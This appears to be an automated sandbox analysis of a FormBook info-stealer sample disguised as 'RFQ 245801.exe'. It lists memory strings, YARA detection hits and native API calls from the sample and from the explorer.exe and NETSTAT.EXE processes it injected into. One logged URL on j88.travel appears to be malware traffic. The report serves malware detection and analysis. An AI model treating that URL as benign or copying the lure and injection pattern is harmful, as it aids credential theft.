Source: explorer.exe, 00000006.00000000.1739582157.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4151697507.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
Source: explorer.exe, 00000006.00000000.1739582157.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4151697507.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
Source: explorer.exe, 00000006.00000000.1739582157.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4151697507.00000000078AD000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu
Source: explorer.exe, 00000006.00000000.1739582157.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4151697507.00000000078AD000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark
Source: explorer.exe, 00000006.00000000.1739582157.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4151697507.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu
Source: explorer.exe, 00000006.00000000.1739582157.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4151697507.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark
Source: explorer.exe, 00000006.00000000.1739582157.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4151697507.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY
Source: explorer.exe, 00000006.00000000.1739582157.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4151697507.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark
Source: explorer.exe, 00000006.00000000.1749071753.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4159457016.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3115691066.000000000C5E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3483071267.000000000C5E5000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://excel.office.com
Source: explorer.exe, 00000006.00000000.1739582157.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4151697507.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
Source: explorer.exe, 00000006.00000000.1739582157.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4151697507.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hlXIY.img
Source: explorer.exe, 00000006.00000000.1739582157.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4151697507.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAKSoFp.img
Source: explorer.exe, 00000006.00000000.1739582157.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4151697507.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAXaopi.img
Source: explorer.exe, 00000006.00000000.1739582157.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4151697507.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAgi0nZ.img
Source: explorer.exe, 00000006.00000000.1739582157.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4151697507.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBqlLky.img
Source: explorer.exe, 00000006.00000000.1739582157.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4151697507.00000000078AD000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img
Source: explorer.exe, 00000006.00000000.1749071753.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4159457016.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3115691066.000000000C5E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3483071267.000000000C5E5000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://outlook.com_
Source: explorer.exe, 00000006.00000000.1749071753.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4159457016.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3115691066.000000000C5E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3483071267.000000000C5E5000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://powerpoint.office.comcember
Source: explorer.exe, 00000006.00000000.1739582157.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4151697507.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://simpleflying.com/how-do-you-become-an-air-traffic-controller/
Source: explorer.exe, 00000006.00000000.1739582157.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4151697507.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000006.00000000.1739582157.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4151697507.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000006.00000000.1749071753.000000000C557000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4159457016.000000000C557000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://wns.windows.com/L
Source: explorer.exe, 00000006.00000000.1749071753.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4159457016.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3115691066.000000000C5E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3483071267.000000000C5E5000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://word.office.com
Source: RFQ 245801.exe String found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0
Source: explorer.exe, 00000006.00000002.4161721752.00000000116FF000.00000004.80000000.00040000.00000000.sdmp, NETSTAT.EXE, 00000007.00000002.4145408903.0000000003ADF000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.j88.travel/c24t/?9rm4ULV=iDjdFcjw5QZJ8NeJJL4ZS/2sliUdDJEhqWnTSCKxgeFtQoD7uajT9bZ2
Source: explorer.exe, 00000006.00000000.1739582157.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4151697507.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1
Source: explorer.exe, 00000006.00000000.1739582157.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4151697507.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi
Source: explorer.exe, 00000006.00000000.1739582157.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4151697507.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1739582157.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4151697507.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-A
Source: explorer.exe, 00000006.00000000.1739582157.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4151697507.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-
Source: explorer.exe, 00000006.00000000.1739582157.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4151697507.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-
Source: explorer.exe, 00000006.00000000.1739582157.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4151697507.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-d
Source: explorer.exe, 00000006.00000000.1739582157.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4151697507.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headerevent
Source: explorer.exe, 00000006.00000000.1739582157.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4151697507.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we
Source: explorer.exe, 00000006.00000000.1739582157.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4151697507.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/ar
Source: explorer.exe, 00000006.00000002.4151697507.00000000078AD000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl
Source: explorer.exe, 00000006.00000000.1739582157.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4151697507.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at
Source: explorer.exe, 00000006.00000000.1739582157.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4151697507.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-of
Source: explorer.exe, 00000006.00000000.1739582157.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4151697507.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win
Source: explorer.exe, 00000006.00000000.1739582157.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4151697507.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com:443/en-us/feed
Source: explorer.exe, 00000006.00000000.1739582157.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4151697507.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.rd.com/list/polite-habits-campers-dislike/
Source: explorer.exe, 00000006.00000000.1739582157.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4151697507.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe

E-Banking Fraud
barindex
Yara detected FormBook
Source: Yara match File source: 5.2.RFQ 245801.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.RFQ 245801.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000007.00000002.4143214191.0000000002D00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.4142849705.0000000002B00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1749545031.0000000003B0D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.4141170996.00000000026A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.1799223243.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 5.2.RFQ 245801.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 5.2.RFQ 245801.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.2.RFQ 245801.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.2.RFQ 245801.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 5.2.RFQ 245801.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.2.RFQ 245801.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.4143214191.0000000002D00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000007.00000002.4143214191.0000000002D00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.4143214191.0000000002D00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.4142849705.0000000002B00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000007.00000002.4142849705.0000000002B00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.4142849705.0000000002B00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.1749545031.0000000003B0D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000000.00000002.1749545031.0000000003B0D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.1749545031.0000000003B0D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.4141170996.00000000026A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000007.00000002.4141170996.00000000026A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.4141170996.00000000026A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.1799223243.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000002.1799223243.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.1799223243.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: RFQ 245801.exe PID: 6716, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: RFQ 245801.exe PID: 4280, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: NETSTAT.EXE PID: 7156, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Initial sample is a PE file and has a suspicious name
Source: initial sample Static PE information: Filename: RFQ 245801.exe
Contains functionality to call native functions
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_0041A330 NtCreateFile, 5_2_0041A330
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_0041A3E0 NtReadFile, 5_2_0041A3E0
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_0041A460 NtClose, 5_2_0041A460
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_0041A510 NtAllocateVirtualMemory, 5_2_0041A510
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_0041A2EA NtCreateFile, 5_2_0041A2EA
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_0041A32A NtCreateFile, 5_2_0041A32A
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_0041A3DA NtReadFile, 5_2_0041A3DA
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_0041A45E NtClose, 5_2_0041A45E
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_0041A50A NtAllocateVirtualMemory, 5_2_0041A50A
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01762B60 NtClose,LdrInitializeThunk, 5_2_01762B60
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01762BF0 NtAllocateVirtualMemory,LdrInitializeThunk, 5_2_01762BF0
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01762AD0 NtReadFile,LdrInitializeThunk, 5_2_01762AD0
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01762D30 NtUnmapViewOfSection,LdrInitializeThunk, 5_2_01762D30
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01762D10 NtMapViewOfSection,LdrInitializeThunk, 5_2_01762D10
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01762DF0 NtQuerySystemInformation,LdrInitializeThunk, 5_2_01762DF0
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01762DD0 NtDelayExecution,LdrInitializeThunk, 5_2_01762DD0
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01762C70 NtFreeVirtualMemory,LdrInitializeThunk, 5_2_01762C70
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01762CA0 NtQueryInformationToken,LdrInitializeThunk, 5_2_01762CA0
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01762F30 NtCreateSection,LdrInitializeThunk, 5_2_01762F30
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01762FE0 NtCreateFile,LdrInitializeThunk, 5_2_01762FE0
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01762FB0 NtResumeThread,LdrInitializeThunk, 5_2_01762FB0
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01762F90 NtProtectVirtualMemory,LdrInitializeThunk, 5_2_01762F90
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01762EA0 NtAdjustPrivilegesToken,LdrInitializeThunk, 5_2_01762EA0
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01762E80 NtReadVirtualMemory,LdrInitializeThunk, 5_2_01762E80
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01764340 NtSetContextThread, 5_2_01764340
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01764650 NtSuspendThread, 5_2_01764650
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01762BE0 NtQueryValueKey, 5_2_01762BE0
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01762BA0 NtEnumerateValueKey, 5_2_01762BA0
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01762B80 NtQueryInformationFile, 5_2_01762B80
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01762AF0 NtWriteFile, 5_2_01762AF0
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01762AB0 NtWaitForSingleObject, 5_2_01762AB0
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01762D00 NtSetInformationFile, 5_2_01762D00
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01762DB0 NtEnumerateKey, 5_2_01762DB0
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01762C60 NtCreateKey, 5_2_01762C60
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01762C00 NtQueryInformationProcess, 5_2_01762C00
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01762CF0 NtOpenProcess, 5_2_01762CF0
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01762CC0 NtQueryVirtualMemory, 5_2_01762CC0
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01762F60 NtCreateProcessEx, 5_2_01762F60
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01762FA0 NtQuerySection, 5_2_01762FA0
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01762E30 NtWriteVirtualMemory, 5_2_01762E30
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01762EE0 NtQueueApcThread, 5_2_01762EE0
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01763010 NtOpenDirectoryObject, 5_2_01763010
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01763090 NtSetValueKey, 5_2_01763090
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_017635C0 NtCreateMutant, 5_2_017635C0
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_017639B0 NtGetContextThread, 5_2_017639B0
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01763D70 NtOpenThread, 5_2_01763D70
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01763D10 NtOpenProcessToken, 5_2_01763D10
Source: C:\Windows\explorer.exe Code function: 6_2_0FBA8232 NtCreateFile, 6_2_0FBA8232
Source: C:\Windows\explorer.exe Code function: 6_2_0FBA9E12 NtProtectVirtualMemory, 6_2_0FBA9E12
Source: C:\Windows\explorer.exe Code function: 6_2_0FBA9E0A NtProtectVirtualMemory, 6_2_0FBA9E0A
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_03112B60 NtClose,LdrInitializeThunk, 7_2_03112B60
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_03112BF0 NtAllocateVirtualMemory,LdrInitializeThunk, 7_2_03112BF0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_03112BE0 NtQueryValueKey,LdrInitializeThunk, 7_2_03112BE0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_03112AD0 NtReadFile,LdrInitializeThunk, 7_2_03112AD0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_03112F30 NtCreateSection,LdrInitializeThunk, 7_2_03112F30
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_03112FE0 NtCreateFile,LdrInitializeThunk, 7_2_03112FE0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_03112EA0 NtAdjustPrivilegesToken,LdrInitializeThunk, 7_2_03112EA0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_03112D10 NtMapViewOfSection,LdrInitializeThunk, 7_2_03112D10
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_03112DD0 NtDelayExecution,LdrInitializeThunk, 7_2_03112DD0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_03112DF0 NtQuerySystemInformation,LdrInitializeThunk, 7_2_03112DF0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_03112C70 NtFreeVirtualMemory,LdrInitializeThunk, 7_2_03112C70
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_03112C60 NtCreateKey,LdrInitializeThunk, 7_2_03112C60
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_03112CA0 NtQueryInformationToken,LdrInitializeThunk, 7_2_03112CA0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_031135C0 NtCreateMutant,LdrInitializeThunk, 7_2_031135C0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_03114340 NtSetContextThread, 7_2_03114340
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_03114650 NtSuspendThread, 7_2_03114650
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_03112B80 NtQueryInformationFile, 7_2_03112B80
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_03112BA0 NtEnumerateValueKey, 7_2_03112BA0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_03112AB0 NtWaitForSingleObject, 7_2_03112AB0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_03112AF0 NtWriteFile, 7_2_03112AF0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_03112F60 NtCreateProcessEx, 7_2_03112F60
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_03112F90 NtProtectVirtualMemory, 7_2_03112F90
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_03112FB0 NtResumeThread, 7_2_03112FB0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_03112FA0 NtQuerySection, 7_2_03112FA0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_03112E30 NtWriteVirtualMemory, 7_2_03112E30
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_03112E80 NtReadVirtualMemory, 7_2_03112E80
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_03112EE0 NtQueueApcThread, 7_2_03112EE0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_03112D00 NtSetInformationFile, 7_2_03112D00
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_03112D30 NtUnmapViewOfSection, 7_2_03112D30
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_03112DB0 NtEnumerateKey, 7_2_03112DB0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_03112C00 NtQueryInformationProcess, 7_2_03112C00
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_03112CC0 NtQueryVirtualMemory, 7_2_03112CC0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_03112CF0 NtOpenProcess, 7_2_03112CF0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_03113010 NtOpenDirectoryObject, 7_2_03113010
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_03113090 NtSetValueKey, 7_2_03113090
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_031139B0 NtGetContextThread, 7_2_031139B0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_03113D10 NtOpenProcessToken, 7_2_03113D10
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_03113D70 NtOpenThread, 7_2_03113D70
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_026BA330 NtCreateFile, 7_2_026BA330
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_026BA3E0 NtReadFile, 7_2_026BA3E0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_026BA460 NtClose, 7_2_026BA460
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_026BA510 NtAllocateVirtualMemory, 7_2_026BA510
